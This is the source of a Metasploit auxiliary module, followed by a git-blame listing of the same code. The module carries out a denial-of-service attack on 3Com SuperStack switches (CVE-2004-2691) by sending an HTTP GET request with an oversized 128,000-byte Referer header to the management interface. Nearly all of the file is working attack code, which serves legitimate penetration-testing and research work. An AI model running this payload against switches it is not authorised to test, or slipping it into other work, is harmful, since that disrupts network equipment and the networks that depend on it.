modules/auxiliary/dos/http/3com_superstack_switch.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(update_info(info,
      'Name'           => '3Com SuperStack Switch Denial of Service',
      'Description'    => %q{
        This module causes a temporary denial of service condition
        against 3Com SuperStack switches. By sending excessive data
        to the HTTP Management interface, the switch stops responding
        temporarily. The device does not reset. Tested successfully
        against a 3300SM firmware v2.66. Reported to affect versions
        prior to v2.72.
      },
      'Author'         => [ 'aushack' ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          # aushack - I am not sure if these are correct, but the closest match!
          [ 'OSVDB', '7246' ],
          [ 'CVE', '2004-2691' ],
          [ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],
        ],
      'DisclosureDate' => '2004-06-24'))

    register_options( [ Opt::RPORT(80) ])
  end

  def run
    begin
      connect
      print_status("Sending DoS packet to #{rhost}:#{rport}")

      sploit = "GET / HTTP/1.0\r\n"
      sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000

      sock.put(sploit +"\r\n\r\n")
      disconnect
      print_error("DoS packet unsuccessful")
    rescue ::Rex::ConnectionRefused
      print_error("Unable to connect to #{rhost}:#{rport}")
    rescue ::Errno::ECONNRESET
      print_good("DoS packet successful. #{rhost} not responding.")
    end

  end
end
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`include Msf::Exploit::Remote::Tcp`
			`include Msf::Auxiliary::Dos`
Retab modules 2013-08-30 16:28:54 -05:00
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`def initialize(info = {})`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`super(update_info(info,`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`'Name' => '3Com SuperStack Switch Denial of Service',`
			`'Description' => %q{`
			`This module causes a temporary denial of service condition`
			`against 3Com SuperStack switches. By sending excessive data`
			`to the HTTP Management interface, the switch stops responding`
Correct spelling re: RFC. Thanks to Shuyao Yu. 2009-07-06 10:07:46 +00:00			`temporarily. The device does not reset. Tested successfully`
			`against a 3300SM firmware v2.66. Reported to affect versions`
			`prior to v2.72.`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`},`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`'Author' => [ 'aushack' ],`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
Change author name to nick. 2017-11-09 03:00:24 +11:00			`# aushack - I am not sure if these are correct, but the closest match!`
Revert "Land #6812 , remove broken OSVDB references" 2016-07-15 12:00:31 -05:00			`[ 'OSVDB', '7246' ],`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`[ 'CVE', '2004-2691' ],`
Correct spelling re: RFC. Thanks to Shuyao Yu. 2009-07-06 10:07:46 +00:00			`[ 'URL', 'http://support.3com.com/infodeli/tools/switches/dna1695-0aaa17.pdf' ],`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`],`
Convert disclosure dates to iso8601 2020-10-02 17:38:06 +01:00			`'DisclosureDate' => '2004-06-24'))`
Retab modules 2013-08-30 16:28:54 -05:00
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`register_options( [ Opt::RPORT(80) ])`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`def run`
			`begin`
			`connect`
			`print_status("Sending DoS packet to #{rhost}:#{rport}")`
Retab modules 2013-08-30 16:28:54 -05:00
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`sploit = "GET / HTTP/1.0\r\n"`
Correct spelling re: RFC. Thanks to Shuyao Yu. 2009-07-06 10:07:46 +00:00			`sploit << "Referer: " + Rex::Text.rand_text_alpha(1) * 128000`
Retab modules 2013-08-30 16:28:54 -05:00
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`sock.put(sploit +"\r\n\r\n")`
			`disconnect`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_error("DoS packet unsuccessful")`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`rescue ::Rex::ConnectionRefused`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_error("Unable to connect to #{rhost}:#{rport}")`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`rescue ::Errno::ECONNRESET`
OCD - print_good & print_error 2017-07-19 12:48:52 +01:00			`print_good("DoS packet successful. #{rhost} not responding.")`
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Added 3com_superstack_switch DoS aux module. 2009-07-01 03:57:04 +00:00			`end`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`end`